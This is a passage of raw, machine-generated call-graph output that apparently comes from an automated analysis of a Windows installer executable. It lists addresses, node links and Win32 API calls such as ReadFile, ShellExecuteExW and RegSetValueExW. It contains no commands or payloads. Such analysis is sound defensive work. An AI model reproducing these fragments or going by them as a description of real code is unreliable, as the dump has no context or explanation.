707e1896 5194->5189 5195 707e2655 10 API calls 5195->5192 5198->5168 5200 707e196f GlobalFree 5198->5200 5200->5168 5203 707e1951 5203->5198 5299 707e15dd wsprintfW 5203->5299 5204 707e194a FreeLibrary 5204->5203 5206->5161 5302 707e12bb GlobalAlloc 5207->5302 5209 707e1c26 5303 707e12bb GlobalAlloc 5209->5303 5211 707e1e6b GlobalFree GlobalFree GlobalFree 5212 707e1e88 5211->5212 5229 707e1ed2 5211->5229 5213 707e227e 5212->5213 5221 707e1e9d 5212->5221 5212->5229 5215 707e22a0 GetModuleHandleW 5213->5215 5213->5229 5214 707e1d26 GlobalAlloc 5234 707e1c31 5214->5234 5218 707e22c6 5215->5218 5219 707e22b1 LoadLibraryW 5215->5219 5216 707e1d71 lstrcpyW 5220 707e1d7b lstrcpyW 5216->5220 5217 707e1d8f GlobalFree 5217->5234 5310 707e16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5218->5310 5219->5218 5219->5229 5220->5234 5221->5229 5306 707e12cc 5221->5306 5223 707e2318 5226 707e2325 lstrlenW 5223->5226 5223->5229 5224 707e2126 5309 707e12bb GlobalAlloc 5224->5309 5311 707e16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5226->5311 5228 707e21ae 5228->5229 5237 707e2216 lstrcpyW 5228->5237 5229->5167 5230 707e22d8 5230->5223 5239 707e2302 GetProcAddress 5230->5239 5232 707e2067 GlobalFree 5232->5234 5233 707e233f 5233->5229 5234->5211 5234->5214 5234->5216 5234->5217 5234->5220 5234->5224 5234->5228 5234->5229 5234->5232 5235 707e12cc 2 API calls 5234->5235 5236 707e1dcd 5234->5236 5235->5234 5236->5234 5304 707e162f GlobalSize GlobalAlloc 5236->5304 5237->5229 5239->5223 5240 707e212f 5240->5167 5243 707e2498 5241->5243 5242 707e12cc GlobalAlloc lstrcpynW 5242->5243 5243->5242 5245 707e25c1 GlobalFree 5243->5245 5246 707e256b GlobalAlloc CLSIDFromString 5243->5246 5247 707e2540 GlobalAlloc WideCharToMultiByte 5243->5247 5250 707e258a 5243->5250 5313 707e135a 5243->5313 5245->5243 5248 707e186f 5245->5248 5246->5245 5247->5245 5248->5177 5248->5178 5248->5189 5250->5245 5317 707e27a4 5250->5317 5254 707e2baa 5251->5254 5252 707e2c4f ReadFile 5253 707e2c6d 5252->5253 5320 707e2b42 5253->5320 5254->5252 5256 707e2d39 5256->5189 5258 707e2453 5257->5258 5259 707e245e GlobalAlloc 5258->5259 5260 707e1868 5258->5260 5259->5258 5260->5169 5266 707e2840 5261->5266 5262 707e28ee 5264 707e28f4 GlobalSize 5262->5264 5265 707e28fe 5262->5265 5263 707e28db GlobalAlloc 5263->5265 5264->5265 5265->5194 5266->5262 5266->5263 5268 707e2e2e 5267->5268 5269 707e2e6e GlobalFree 5268->5269 5324 707e12bb GlobalAlloc 5270->5324 5272 707e26fa StringFromGUID2 5278 707e265f 5272->5278 5273 707e270b lstrcpynW 5273->5278 5274 707e26d8 MultiByteToWideChar 5274->5278 5275 707e271e wsprintfW 5275->5278 5276 707e2742 GlobalFree 5276->5278 5277 707e2777 GlobalFree 5277->5187 5278->5272 5278->5273 5278->5274 5278->5275 5278->5276 5278->5277 5279 707e1312 2 API calls 5278->5279 5325 707e1381 5278->5325 5279->5278 5329 707e12bb GlobalAlloc 5281->5329 5283 707e1659 5284 707e1666 2 API calls 5283->5284 5285 707e1663 5284->5285 5286 707e1312 5285->5286 5287 707e131b GlobalAlloc lstrcpynW 5286->5287 5288 707e1355 GlobalFree 5286->5288 5287->5288 5288->5192 5291 707e1672 wsprintfW 5289->5291 5293 707e169f lstrcpyW 5289->5293 5294 707e16b8 5291->5294 5293->5294 5294->5195 5296 707e2626 5295->5296 5297 707e1931 5295->5297 5296->5297 5298 707e2642 GlobalFree 5296->5298 5297->5203 5297->5204 5298->5296 5300 707e1312 2 API calls 5299->5300 5301 707e15fe 5300->5301 5301->5198 5302->5209 5303->5234 5305 707e164d 5304->5305 5305->5236 5312 707e12bb GlobalAlloc 5306->5312 5308 707e12db lstrcpynW 5308->5229 5309->5240 5310->5230 5311->5233 5312->5308 5314 707e1361 5313->5314 5315 707e12cc 2 API calls 5314->5315 5316 707e137f 5315->5316 5316->5243 5318 707e2808 5317->5318 5319 707e27b2 VirtualAlloc 5317->5319 5318->5250 5319->5318 5321 707e2b4d 5320->5321 5322 707e2b5d 5321->5322 5323 707e2b52 GetLastError 5321->5323 5322->5256 5323->5322 5324->5278 5326 707e13ac 5325->5326 5327 707e138a 5325->5327 5326->5278 5327->5326 5328 707e1390 lstrcpyW 5327->5328 5328->5326 5329->5283 5607 707e2d43 5608 707e2d5b 5607->5608 5609 707e162f 2 API calls 5608->5609 5610 707e2d76 5609->5610 5611 402b7e 5612 402bd0 5611->5612 5613 402b85 5611->5613 5614 406935 5 API calls 5612->5614 5616 402da9 21 API calls 5613->5616 5618 402bce 5613->5618 5615 402bd7 5614->5615 5617 402dcb 21 API calls 5615->5617 5619 402b93 5616->5619 5620 402be0 5617->5620 5621 402da9 21 API calls 5619->5621 5620->5618 5622 402be4 IIDFromString 5620->5622 5624 402b9f 5621->5624 5622->5618 5623 402bf3 5622->5623 5623->5618 5629 406541 lstrcpynW 5623->5629 5628 406488 wsprintfW 5624->5628 5626 402c10 CoTaskMemFree 5626->5618 5628->5618 5629->5626 5637 40467f 5638 404697 5637->5638 5642 4047b1 5637->5642 5643 4044c0 22 API calls 5638->5643 5639 40481b 5640 4048e5 5639->5640 5641 404825 GetDlgItem 5639->5641 5645 404527 8 API calls 5640->5645 5646 40483f 5641->5646 5647 4048a6 5641->5647 5642->5639 5642->5640 5648 4047ec GetDlgItem SendMessageW 5642->5648 5644 4046fe 5643->5644 5649 4044c0 22 API calls 5644->5649 5650 4048e0 5645->5650 5646->5647 5651 404865 SendMessageW LoadCursorW SetCursor 5646->5651 5647->5640 5652 4048b8 5647->5652 5670 4044e2 KiUserCallbackDispatcher 5648->5670 5654 40470b CheckDlgButton 5649->5654 5674 40492e 5651->5674 5656 4048ce 5652->5656 5657 4048be SendMessageW 5652->5657 5668 4044e2 KiUserCallbackDispatcher 5654->5668 5656->5650 5662 4048d4 SendMessageW 5656->5662 5657->5656 5658 404816 5671 40490a 5658->5671 5662->5650 5663 404729 GetDlgItem 5669 4044f5 SendMessageW 5663->5669 5665 40473f SendMessageW 5666 404765 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5665->5666 5667 40475c GetSysColor 5665->5667 5666->5650 5667->5666 5668->5663 5669->5665 5670->5658 5672 404918 5671->5672 5673 40491d SendMessageW 5671->5673 5672->5673 5673->5639 5677 405b67 ShellExecuteExW 5674->5677 5676 404894 LoadCursorW SetCursor 5676->5647 5677->5676 5678 401000 5679 401037 BeginPaint GetClientRect 5678->5679 5680 40100c DefWindowProcW 5678->5680 5682 4010f3 5679->5682 5683 401179 5680->5683 5684 401073 CreateBrushIndirect FillRect DeleteObject 5682->5684 5685 4010fc 5682->5685 5684->5682 5686 401102 CreateFontIndirectW 5685->5686 5687 401167 EndPaint 5685->5687 5686->5687 5688 401112 6 API calls 5686->5688 5687->5683 5688->5687 5689 402a80 5690 402da9 21 API calls 5689->5690 5691 402a86 5690->5691 5692 402953 5691->5692 5693 402ac9 5691->5693 5694 402aad 5691->5694 5695 402ae3 5693->5695 5696 402ad3 5693->5696 5697 402ab2 5694->5697 5698 402ac3 5694->5698 5700 40657e 21 API calls 5695->5700 5699 402da9 21 API calls 5696->5699 5703 406541 lstrcpynW 5697->5703 5704 406488 wsprintfW 5698->5704 5699->5692 5700->5692 5703->5692 5704->5692 4411 401781 4417 402dcb 4411->4417 4415 40178f 4416 406060 2 API calls 4415->4416 4416->4415 4418 402dd7 4417->4418 4419 40657e 21 API calls 4418->4419 4420 402df8 4419->4420 4421 401788 4420->4421 4422 4067ef 5 API calls 4420->4422 4423 406060 4421->4423 4422->4421 4424 40606d GetTickCount GetTempFileNameW 4423->4424 4425 4060a7 4424->4425 4426 4060a3 4424->4426 4425->4415 4426->4424 4426->4425 5705 401d82 5706 402da9 21 API calls 5705->5706 5707 401d93 SetWindowLongW 5706->5707 5708 402c4f 5707->5708 4427 401f03 4435 402da9 4427->4435 4429 401f09 4430 402da9 21 API calls 4429->4430 4431 401f15 4430->4431 4432 401f21 ShowWindow 4431->4432 4433 401f2c EnableWindow 4431->4433 4434 402c4f 4432->4434 4433->4434 4436 40657e 21 API calls 4435->4436 4437 402dbe 4436->4437 4437->4429 5709 707e103d 5712 707e101b 5709->5712 5713 707e15b6 GlobalFree 5712->5713 5714 707e1020 5713->5714 5715 707e1027 GlobalAlloc 5714->5715 5716 707e1024 5714->5716 5715->5716 5717 707e15dd 3 API calls 5716->5717 5718 707e103b 5717->5718 5719 401503 5720 401508 5719->5720 5722 40152e 5719->5722 5721 402da9 21 API calls 5720->5721 5721->5722 5723 402903 5724 40290b 5723->5724 5725 40290f FindNextFileW 5724->5725 5727 402921 5724->5727 5726 402968 5725->5726 5725->5727 5729 406541 lstrcpynW 5726->5729 5729->5727 4438 405705 4439 405726 GetDlgItem GetDlgItem GetDlgItem 4438->4439 4440 4058af 4438->4440 4484 4044f5 SendMessageW 4439->4484 4442 4058e0 4440->4442 4443 4058b8 GetDlgItem CreateThread CloseHandle 4440->4443 4444 40590b 4442->4444 4446 405930 4442->4446 4447 4058f7 ShowWindow ShowWindow 4442->4447 4443->4442 4498 405699 OleInitialize 4443->4498 4448 405917 4444->4448 4449 40596b 4444->4449 4445 405796 4454 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4445->4454 4453 404527 8 API calls 4446->4453 4486 4044f5 SendMessageW 4447->4486 4451 405945 ShowWindow 4448->4451 4452 40591f 4448->4452 4449->4446 4457 405979 SendMessageW 4449->4457 4460 405965 4451->4460 4461 405957 4451->4461 4458 404499 SendMessageW 4452->4458 4459 40593e 4453->4459 4455 40580b 4454->4455 4456 4057ef SendMessageW SendMessageW 4454->4456 4462 405810 SendMessageW 4455->4462 4463 40581e 4455->4463 4456->4455 4457->4459 4464 405992 CreatePopupMenu 4457->4464 4458->4446 4466 404499 SendMessageW 4460->4466 4487 4055c6 4461->4487 4462->4463 4468 4044c0 22 API calls 4463->4468 4467 40657e 21 API calls 4464->4467 4466->4449 4469 4059a2 AppendMenuW 4467->4469 4470 40582e 4468->4470 4471 4059d2 TrackPopupMenu 4469->4471 4472 4059bf GetWindowRect 4469->4472 4473 405837 ShowWindow 4470->4473 4474 40586b GetDlgItem SendMessageW 4470->4474 4471->4459 4475 4059ed 4471->4475 4472->4471 4476 40585a 4473->4476 4477 40584d ShowWindow 4473->4477 4474->4459 4478 405892 SendMessageW SendMessageW 4474->4478 4479 405a09 SendMessageW 4475->4479 4485 4044f5 SendMessageW 4476->4485 4477->4476 4478->4459 4479->4479 4480 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4479->4480 4482 405a4b SendMessageW 4480->4482 4482->4482 4483 405a74 GlobalUnlock SetClipboardData CloseClipboard 4482->4483 4483->4459 4484->4445 4485->4474 4486->4444 4488 4055e1 4487->4488 4496 405683 4487->4496 4489 4055fd lstrlenW 4488->4489 4490 40657e 21 API calls 4488->4490 4491 405626 4489->4491 4492 40560b lstrlenW 4489->4492 4490->4489 4494 405639 4491->4494 4495 40562c SetWindowTextW 4491->4495 4493 40561d lstrcatW 4492->4493 4492->4496 4493->4491 4494->4496 4497 40563f SendMessageW SendMessageW SendMessageW 4494->4497 4495->4494 4496->4460 4497->4496 4499 40450c SendMessageW 4498->4499 4502 4056bc 4499->4502 4500 4056e3 4501 40450c SendMessageW 4500->4501 4503 4056f5 OleUninitialize 4501->4503 4502->4500 4504 401389 2 API calls 4502->4504 4504->4502 5730 404d07 5731 404d33 5730->5731 5732 404d17 5730->5732 5733 404d66 5731->5733 5734 404d39 SHGetPathFromIDListW 5731->5734 5741 405b85 GetDlgItemTextW 5732->5741 5737 404d50 SendMessageW 5734->5737 5738 404d49 5734->5738 5736 404d24 SendMessageW 5736->5731 5737->5733 5739 40140b 2 API calls 5738->5739 5739->5737 5741->5736 5742 401588 5743 402bc9 5742->5743 5746 406488 wsprintfW 5743->5746 5745 402bce 5746->5745 5747 40198d 5748 402da9 21 API calls 5747->5748 5749 401994 5748->5749 5750 402da9 21 API calls 5749->5750 5751 4019a1 5750->5751 5752 402dcb 21 API calls 5751->5752 5753 4019b8 lstrlenW 5752->5753 5755 4019c9 5753->5755 5754 401a0a 5755->5754 5759 406541 lstrcpynW 5755->5759 5757 4019fa 5757->5754 5758 4019ff lstrlenW 5757->5758 5758->5754 5759->5757 5760 40168f 5761 402dcb 21 API calls 5760->5761 5762 401695 5761->5762 5763 40689e 2 API calls 5762->5763 5764 40169b 5763->5764 5765 402b10 5766 402da9 21 API calls 5765->5766 5767 402b16 5766->5767 5768 40657e 21 API calls 5767->5768 5769 402953 5767->5769 5768->5769 4796 402711 4797 402da9 21 API calls 4796->4797 4805 402720 4797->4805 4798 40285d 4799 40276a ReadFile 4799->4798 4799->4805 4800 402803 4800->4798 4800->4805 4810 406112 SetFilePointer 4800->4810 4801 4060b4 ReadFile 4801->4805 4803 4027aa MultiByteToWideChar 4803->4805 4804 40285f 4819 406488 wsprintfW 4804->4819 4805->4798 4805->4799 4805->4800 4805->4801 4805->4803 4805->4804 4807 4027d0 SetFilePointer MultiByteToWideChar 4805->4807 4808 402870 4805->4808 4807->4805 4808->4798 4809 402891 SetFilePointer 4808->4809 4809->4798 4811 40612e 4810->4811 4814 406146 4810->4814 4812 4060b4 ReadFile 4811->4812 4813 40613a 4812->4813 4813->4814 4815 406177 SetFilePointer 4813->4815 4816 40614f SetFilePointer 4813->4816 4814->4800 4815->4814 4816->4815 4817 40615a 4816->4817 4818 4060e3 WriteFile 4817->4818 4818->4814 4819->4798 5770 401491 5771 4055c6 28 API calls 5770->5771 5772 401498 5771->5772 4820 401794 4821 402dcb 21 API calls 4820->4821 4822 40179b 4821->4822 4823 4017c3 4822->4823 4824 4017bb 4822->4824 4861 406541 lstrcpynW 4823->4861 4860 406541 lstrcpynW 4824->4860 4827 4017c1 4831 4067ef 5 API calls 4827->4831 4828 4017ce 4829 405e10 3 API calls 4828->4829 4830 4017d4 lstrcatW 4829->4830 4830->4827 4834 4017e0 4831->4834 4832 40689e 2 API calls 4832->4834 4833 40181c 4835 40600c 2 API calls 4833->4835 4834->4832 4834->4833 4837 4017f2 CompareFileTime 4834->4837 4838 4018b2 4834->4838 4845 40657e 21 API calls 4834->4845 4849 406541 lstrcpynW 4834->4849 4855 405ba1 MessageBoxIndirectW 4834->4855 4857 401889 4834->4857 4859 406031 GetFileAttributesW CreateFileW 4834->4859 4835->4834 4837->4834 4839 4055c6 28 API calls 4838->4839 4840 4018bc 4839->4840 4842 4032d9 39 API calls 4840->4842 4841 4055c6 28 API calls 4847 40189e 4841->4847 4843 4018cf 4842->4843 4844 4018e3 SetFileTime 4843->4844 4846 4018f5 CloseHandle 4843->4846 4844->4846 4845->4834 4846->4847 4848 401906 4846->4848 4850 40190b 4848->4850 4851 40191e 4848->4851 4849->4834 4853 40657e 21 API calls 4850->4853 4852 40657e 21 API calls 4851->4852 4854 401926 4852->4854 4856 401913 lstrcatW 4853->4856 4854->4847 4858 405ba1 MessageBoxIndirectW 4854->4858 4855->4834 4856->4854 4857->4841 4857->4847 4858->4847 4859->4834 4860->4827 4861->4828 5787 401a97 5788 402da9 21 API calls 5787->5788 5789 401aa0 5788->5789 5790 402da9 21 API calls 5789->5790 5791 401a45 5790->5791 5792 401598 5793 4015b1 5792->5793 5794 4015a8 ShowWindow 5792->5794 5795 402c4f 5793->5795 5796 4015bf ShowWindow 5793->5796 5794->5793 5796->5795 4902 402419 4903 402dcb 21 API calls 4902->4903 4904 402428 4903->4904 4905 402dcb 21 API calls 4904->4905 4906 402431 4905->4906 4907 402dcb 21 API calls 4906->4907 4908 40243b GetPrivateProfileStringW 4907->4908 5797 40201b 5798 402dcb 21 API calls 5797->5798 5799 402022 5798->5799 5800 40689e 2 API calls 5799->5800 5801 402028 5800->5801 5803 402039 5801->5803 5804 406488 wsprintfW 5801->5804 5804->5803 4909 40351c SetErrorMode GetVersionExW 4910 403570 GetVersionExW 4909->4910 4911 4035a8 4909->4911 4910->4911 4912 4035ff 4911->4912 4913 406935 5 API calls 4911->4913 4914 4068c5 3 API calls 4912->4914 4913->4912 4915 403615 lstrlenA 4914->4915 4915->4912 4916 403625 4915->4916 4917 406935 5 API calls 4916->4917 4918 40362c 4917->4918 4919 406935 5 API calls 4918->4919 4920 403633 4919->4920 4921 406935 5 API calls 4920->4921 4922 40363f #17 OleInitialize SHGetFileInfoW 4921->4922 4997 406541 lstrcpynW 4922->4997 4925 40368e GetCommandLineW 4998 406541 lstrcpynW 4925->4998 4927 4036a0 4928 405e3d CharNextW 4927->4928 4929 4036c6 CharNextW 4928->4929 4935 4036d8 4929->4935 4930 4037da 4931 4037ee GetTempPathW 4930->4931 4999 4034eb 4931->4999 4933 403806 4936 403860 DeleteFileW 4933->4936 4937 40380a GetWindowsDirectoryW lstrcatW 4933->4937 4934 405e3d CharNextW 4934->4935 4935->4930 4935->4934 4943 4037dc 4935->4943 5009 4030a2 GetTickCount GetModuleFileNameW 4936->5009 4939 4034eb 12 API calls 4937->4939 4941 403826 4939->4941 4940 403874 4949 405e3d CharNextW 4940->4949 4980 40391b 4940->4980 4988 40392b 4940->4988 4941->4936 4942 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4941->4942 4944 4034eb 12 API calls 4942->4944 5093 406541 lstrcpynW 4943->5093 4947 403858 4944->4947 4947->4936 4947->4988 4953 403893 4949->4953 4951 403a79 4954 405ba1 MessageBoxIndirectW 4951->4954 4952 403a9d 4955 403b21 ExitProcess 4952->4955 4956 403aa5 GetCurrentProcess OpenProcessToken 4952->4956 4957 4038f1 4953->4957 4958 403934 4953->4958 4960 403a87 ExitProcess 4954->4960 4961 403af1 4956->4961 4962 403abd LookupPrivilegeValueW AdjustTokenPrivileges 4956->4962 4963 405f18 18 API calls 4957->4963 4964 405b0c 5 API calls 4958->4964 4965 406935 5 API calls 4961->4965 4962->4961 4966 4038fd 4963->4966 4967 403939 lstrlenW 4964->4967 4968 403af8 4965->4968 4966->4988 5094 406541 lstrcpynW 4966->5094 5096 406541 lstrcpynW 4967->5096 4969 403b0d ExitWindowsEx 4968->4969 4971 403b1a 4968->4971 4969->4955 4969->4971 4975 40140b 2 API calls 4971->4975 4973 403953 4974 40396b 4973->4974 5097 406541 lstrcpynW 4973->5097 4979 403991 wsprintfW 4974->4979 4994 4039bd 4974->4994 4975->4955 4976 403910 5095 406541 lstrcpynW 4976->5095 4981 40657e 21 API calls 4979->4981 5037 403c13 4980->5037 4981->4974 4982 405a95 2 API calls 4982->4994 4983 405aef 2 API calls 4983->4994 4984 403a07 SetCurrentDirectoryW 4986 406301 40 API calls 4984->4986 4985 4039cd GetFileAttributesW 4987 4039d9 DeleteFileW 4985->4987 4985->4994 4989 403a16 CopyFileW 4986->4989 4987->4994 5098 403b39 4988->5098 4989->4988 4989->4994 4990 405c4d 71 API calls 4990->4994 4991 406301 40 API calls 4991->4994 4992 40657e 21 API calls 4992->4994 4993 405b24 2 API calls 4993->4994 4994->4974 4994->4979 4994->4982 4994->4983 4994->4984 4994->4985 4994->4988 4994->4990 4994->4991 4994->4992 4994->4993 4995 403a8f CloseHandle 4994->4995 4996 40689e 2 API calls 4994->4996 4995->4988 4996->4994 4997->4925 4998->4927 5000 4067ef 5 API calls 4999->5000 5002 4034f7 5000->5002 5001 403501 5001->4933 5002->5001 5003 405e10 3 API calls 5002->5003 5004 403509 5003->5004 5005 405aef 2 API calls 5004->5005 5006 40350f 5005->5006 5007 406060 2 API calls 5006->5007 5008 40351a 5007->5008 5008->4933 5105 406031 GetFileAttributesW CreateFileW 5009->5105 5011 4030e2 5036 4030f2 5011->5036 5106 406541 lstrcpynW 5011->5106 5013 403108 5014 405e5c 2 API calls 5013->5014 5015 40310e 5014->5015 5107 406541 lstrcpynW 5015->5107 5017 403119 GetFileSize 5032 403213 5017->5032 5035 403130 5017->5035 5019 40321c 5021 40324c GlobalAlloc 5019->5021 5019->5036 5120 4034d4 SetFilePointer 5019->5120 5020 4034be ReadFile 5020->5035 5119 4034d4 SetFilePointer 5021->5119 5024 40327f 5026 40303e 6 API calls 5024->5026 5025 403267 5028 4032d9 39 API calls 5025->5028 5026->5036 5027 403235 5029 4034be ReadFile 5027->5029 5033 403273 5028->5033 5030 403240 5029->5030 5030->5021 5030->5036 5031 40303e 6 API calls 5031->5035 5108 40303e 5032->5108 5033->5033 5034 4032b0 SetFilePointer 5033->5034 5033->5036 5034->5036 5035->5020 5035->5024 5035->5031 5035->5032 5035->5036 5036->4940 5038 406935 5 API calls 5037->5038 5039 403c27 5038->5039 5040 403c2d 5039->5040 5041 403c3f 5039->5041 5129 406488 wsprintfW 5040->5129 5042 40640f 3 API calls 5041->5042 5043 403c6f 5042->5043 5045 403c8e lstrcatW 5043->5045 5047 40640f 3 API calls 5043->5047 5046 403c3d 5045->5046 5121 403ee9 5046->5121 5047->5045 5050 405f18 18 API calls 5051 403cc0 5050->5051 5052 403d54 5051->5052 5054 40640f 3 API calls 5051->5054 5053 405f18 18 API calls 5052->5053 5055 403d5a 5053->5055 5056 403cf2 5054->5056 5057 403d6a LoadImageW 5055->5057 5058 40657e 21 API calls 5055->5058 5056->5052 5061 403d13 lstrlenW 5056->5061 5065 405e3d CharNextW 5056->5065 5059 403e10 5057->5059 5060 403d91 RegisterClassW 5057->5060 5058->5057 5063 40140b 2 API calls 5059->5063 5062 403dc7 SystemParametersInfoW CreateWindowExW 5060->5062 5092 403e1a 5060->5092 5066 403d21 lstrcmpiW 5061->5066 5067 403d47 5061->5067 5062->5059 5064 403e16 5063->5064 5071 403ee9 22 API calls 5064->5071 5064->5092 5069 403d10 5065->5069 5066->5067 5070 403d31 GetFileAttributesW 5066->5070 5068 405e10 3 API calls 5067->5068 5072 403d4d 5068->5072 5069->5061 5073 403d3d 5070->5073 5075 403e27 5071->5075 5130 406541 lstrcpynW 5072->5130 5073->5067 5074 405e5c 2 API calls 5073->5074 5074->5067 5077 403e33 ShowWindow 5075->5077 5078 403eb6 5075->5078 5080 4068c5 3 API calls 5077->5080 5079 405699 5 API calls 5078->5079 5081 403ebc 5079->5081 5082 403e4b 5080->5082 5083 403ec0 5081->5083 5084 403ed8 5081->5084 5085 403e59 GetClassInfoW 5082->5085 5087 4068c5 3 API calls 5082->5087 5090 40140b 2 API calls 5083->5090 5083->5092 5086 40140b 2 API calls 5084->5086 5088 403e83 DialogBoxParamW 5085->5088 5089 403e6d GetClassInfoW RegisterClassW 5085->5089 5086->5092 5087->5085 5091 40140b 2 API calls 5088->5091 5089->5088 5090->5092 5091->5092 5092->4988 5093->4931 5094->4976 5095->4980 5096->4973 5097->4974 5099 403b51 5098->5099 5100 403b43 CloseHandle 5098->5100 5132 403b7e 5099->5132 5100->5099 5103 405c4d 71 API calls 5104 403a6c OleUninitialize 5103->5104 5104->4951 5104->4952 5105->5011 5106->5013 5107->5017 5109 403047 5108->5109 5110 40305f 5108->5110 5111 403050 DestroyWindow 5109->5111 5112 403057 5109->5112 5113 403067 5110->5113 5114 40306f GetTickCount 5110->5114 5111->5112 5112->5019 5115 406971 2 API calls 5113->5115 5116 4030a0 5114->5116 5117 40307d CreateDialogParamW ShowWindow 5114->5117 5118 40306d 5115->5118 5116->5019 5117->5116 5118->5019 5119->5025 5120->5027 5122 403efd 5121->5122 5131 406488 wsprintfW 5122->5131 5124 403f6e 5125 403fa2 22 API calls 5124->5125 5127 403f73 5125->5127 5126 403c9e 5126->5050 5127->5126 5128 40657e 21 API calls 5127->5128 5128->5127 5129->5046 5130->5052 5131->5124 5133 403b8c 5132->5133 5134 403b56 5133->5134 5135 403b91 FreeLibrary GlobalFree 5133->5135 5134->5103 5135->5134 5135->5135 5812 401b9c 5813 402dcb 21 API calls 5812->5813 5814 401ba3 5813->5814 5815 402da9 21 API calls 5814->5815 5816 401bac wsprintfW 5815->5816 5817 402c4f 5816->5817 5818 40149e 5819 4023c2 5818->5819 5820 4014ac PostQuitMessage 5818->5820 5820->5819 5821 4016a0 5822 402dcb 21 API calls 5821->5822 5823 4016a7 5822->5823 5824 402dcb 21 API calls 5823->5824 5825 4016b0 5824->5825 5826 402dcb 21 API calls 5825->5826 5827 4016b9 MoveFileW 5826->5827 5828 4016cc 5827->5828 5834 4016c5 5827->5834 5830 40689e 2 API calls 5828->5830 5832 40231b 5828->5832 5829 401423 28 API calls 5829->5832 5831 4016db 5830->5831 5831->5832 5833 406301 40 API calls 5831->5833 5833->5834 5834->5829 5835 401a24 5836 402dcb 21 API calls 5835->5836 5837 401a2b 5836->5837 5838 402dcb 21 API calls 5837->5838 5839 401a34 5838->5839 5840 401a3b lstrcmpiW 5839->5840 5841 401a4d lstrcmpW 5839->5841 5842 401a41 5840->5842 5841->5842 5843 402324 5844 402dcb 21 API calls 5843->5844 5845 40232a 5844->5845 5846 402dcb 21 API calls 5845->5846 5847 402333 5846->5847 5848 402dcb 21 API calls 5847->5848 5849 40233c 5848->5849 5850 40689e 2 API calls 5849->5850 5851 402345 5850->5851 5852 402356 lstrlenW lstrlenW 5851->5852 5853 402349 5851->5853 5855 4055c6 28 API calls 5852->5855 5854 4055c6 28 API calls 5853->5854 5856 402351 5853->5856 5854->5856 5857 402394 SHFileOperationW 5855->5857 5857->5853 5857->5856 5858 401da6 5859 401db9 GetDlgItem 5858->5859 5860 401dac 5858->5860 5862 401db3 5859->5862 5861 402da9 21 API calls 5860->5861 5861->5862 5863 401dfa GetClientRect LoadImageW SendMessageW 5862->5863 5864 402dcb 21 API calls 5862->5864 5866 401e58 5863->5866 5868 401e64 5863->5868 5864->5863 5867 401e5d DeleteObject 5866->5867 5866->5868 5867->5868 5869 4023a8 5870 4023af 5869->5870 5872 4023c2 5869->5872 5871 40657e 21 API calls 5870->5871 5873 4023bc 5871->5873 5873->5872 5874 405ba1 MessageBoxIndirectW 5873->5874 5874->5872 5875 402c2a SendMessageW 5876 402c44 InvalidateRect 5875->5876 5877 402c4f 5875->5877 5876->5877 5885 404f2d GetDlgItem GetDlgItem 5886 4051a4 5885->5886 5887 404f7f 7 API calls 5885->5887 5906 405286 5886->5906 5920 405213 5886->5920 5939 404e7b SendMessageW 5886->5939 5888 405026 DeleteObject 5887->5888 5889 405019 SendMessageW 5887->5889 5890 40502f 5888->5890 5889->5888 5891 405066 5890->5891 5892 40657e 21 API calls 5890->5892 5893 4044c0 22 API calls 5891->5893 5897 405048 SendMessageW SendMessageW 5892->5897 5898 40507a 5893->5898 5894 405332 5895 405344 5894->5895 5896 40533c SendMessageW 5894->5896 5908 405356 ImageList_Destroy 5895->5908 5909 40535d 5895->5909 5914 40536d 5895->5914 5896->5895 5897->5890 5903 4044c0 22 API calls 5898->5903 5899 405197 5901 404527 8 API calls 5899->5901 5900 405278 SendMessageW 5900->5906 5907 405533 5901->5907 5917 40508b 5903->5917 5904 4052df SendMessageW 5904->5899 5905 4052f4 SendMessageW 5904->5905 5911 405307 5905->5911 5906->5894 5906->5899 5906->5904 5908->5909 5912 405366 GlobalFree 5909->5912 5909->5914 5910 4054e7 5910->5899 5915 4054f9 ShowWindow GetDlgItem ShowWindow 5910->5915 5922 405318 SendMessageW 5911->5922 5912->5914 5913 405166 GetWindowLongW SetWindowLongW 5916 40517f 5913->5916 5914->5910 5932 4053a8 5914->5932 5944 404efb 5914->5944 5915->5899 5918 405184 ShowWindow 5916->5918 5919 40519c 5916->5919 5917->5913 5921 4050de SendMessageW 5917->5921 5923 405161 5917->5923 5926 405130 SendMessageW 5917->5926 5927 40511c SendMessageW 5917->5927 5937 4044f5 SendMessageW 5918->5937 5938 4044f5 SendMessageW 5919->5938 5920->5900 5920->5906 5921->5917 5922->5894 5923->5913 5923->5916 5926->5917 5927->5917 5929 4054b2 5930 4054bd InvalidateRect 5929->5930 5933 4054c9 5929->5933 5930->5933 5931 4053d6 SendMessageW 5936 4053ec 5931->5936 5932->5931 5932->5936 5933->5910 5953 404e36 5933->5953 5935 405460 SendMessageW SendMessageW 5935->5936 5936->5929 5936->5935 5937->5899 5938->5886 5940 404eda SendMessageW 5939->5940 5941 404e9e GetMessagePos ScreenToClient SendMessageW 5939->5941 5942 404ed2 5940->5942 5941->5942 5943 404ed7 5941->5943 5942->5920 5943->5940 5956 406541 lstrcpynW 5944->5956 5946 404f0e 5957 406488 wsprintfW 5946->5957 5948 404f18 5949 40140b 2 API calls 5948->5949 5950 404f21 5949->5950 5958 406541 lstrcpynW 5950->5958 5952 404f28 5952->5932 5959 404d6d 5953->5959 5955 404e4b 5955->5910 5956->5946 5957->5948 5958->5952 5960 404d86 5959->5960 5961 40657e 21 API calls 5960->5961 5962 404dea 5961->5962 5963 40657e 21 API calls 5962->5963 5964 404df5 5963->5964 5965 40657e 21 API calls 5964->5965 5966 404e0b lstrlenW wsprintfW SetDlgItemTextW 5965->5966 5966->5955 4729 4024af 4730 402dcb 21 API calls 4729->4730 4731 4024c1 4730->4731 4732 402dcb 21 API calls 4731->4732 4733 4024cb 4732->4733 4746 402e5b 4733->4746 4736 402c4f 4737 402dcb 21 API calls 4741 4024f9 lstrlenW 4737->4741 4738 402503 4739 40250f 4738->4739 4742 402da9 21 API calls 4738->4742 4740 40252e RegSetValueExW 4739->4740 4750 4032d9 4739->4750 4744 402544 RegCloseKey 4740->4744 4741->4738 4742->4739 4744->4736 4747 402e76 4746->4747 4771 4063dc 4747->4771 4752 4032f2 4750->4752 4751 40331d 